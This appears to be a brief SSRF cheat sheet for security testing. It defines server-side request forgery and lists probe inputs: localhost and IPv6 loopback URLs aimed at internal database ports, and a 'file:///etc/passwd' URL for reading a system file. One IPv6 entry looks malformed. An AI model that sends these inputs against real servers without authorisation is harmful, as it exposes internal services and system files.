866 B
866 B
Server Side Request Forgery (SSRF)
is a vulnerability in web applications whereby an attacker can make further HTTP requests through the server. An attacker can make use of this vulnerability to communicate with any internal services on the server's network which are generally protected by firewalls.
Usage
Sanity Test Service
Test if input is sanitized by exploiting function. Here it is IP:PORT finding service. Test for localhost ports.
http://127.0.0.1:3306
http://localhost:5432
http://0.0.0.0:53
- IPv6
http://[::]:3306
http://:::3006
Reading files
file:///etc/passwd